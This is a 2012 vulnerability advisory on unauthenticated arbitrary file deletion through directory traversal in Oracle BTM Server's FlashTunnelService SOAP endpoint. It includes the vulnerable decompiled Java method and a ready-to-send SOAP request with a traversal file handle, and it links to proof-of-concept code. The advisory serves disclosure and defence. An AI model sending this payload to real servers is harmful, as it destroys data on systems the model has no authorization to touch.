Oracle Business Transaction Management Server FlashTunnelService Remote File Deletion

nospam@xxxxxxxx · Tue, 7 Aug 2012 11:02:53 GMT

Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService 
Remote File Deletion

tested against: Microsoft Windows Server 2003 r2 sp2
                Oracle WebLogic Server 12c (12.1.1)
                Oracle Business Transaction Management Server 12.1.0.2.7 (Production version)

files tested: 
oepe-indigo-installer-12.1.1.0.1.201203120349-12.1.1-win32.exe (weblogic)
download url: http://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html              

BTM_Servers_12.1.0.2.7.zip (BTM, production version) 
download url: http://www.oracle.com/technetwork/oem/downloads/btw-downloads-207704.html

vulnerability:
the mentioned product installs a web service 
called "FlashTunnelService" which can be reached
without prior authentication and processes incoming
SOAP requests.

It can be reached at the following uri:
http://[host]:7001/btmui/soa/flash_svc/

This soap interface exposes the 'deleteFile' function
which could allow to delete arbitrary files with administrative
privileges on the target
server through a directory traversal vulnerability.
This could be useful for further attacks.

Example packet:

POST /btmui/soa/flash_svc/ HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: "http://soa.amberpoint.com/deleteFile";
User-Agent: Jakarta Commons-HttpClient/3.1
Host: [host]:7001
Content-Length: [length]

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"; xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces"; xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types";>
   <soapenv:Header/>
   <soapenv:Body>
      <int:deleteFileRequest>
         <int:deleteFile handle="../../../../../../../../../../../../somepath/somefile.ext">
            <typ:DeleteFileRequestVersion>
            </typ:DeleteFileRequestVersion>
         </int:deleteFile>
      </int:deleteFileRequest>
   </soapenv:Body>
</soapenv:Envelope>

Vulnerable code, see the decompiled com.amberpoint.flashtunnel.impl.FlashTunnelServiceImpl class:
..
public IDeleteFileResponse deleteFile(IDeleteFileRequest request)
        throws SOAPFaultException
    {
        DeleteFileResponse dfr = new DeleteFileResponse();
        String handle = request.getHandle();
        File f = getFileFromHandle(handle);
        if(f != null)
            f.delete();
        return dfr;
    }
..

As attachment, proof of concept code.

poc: http://retrogod.altervista.org/9sg_ora2.htm

rgod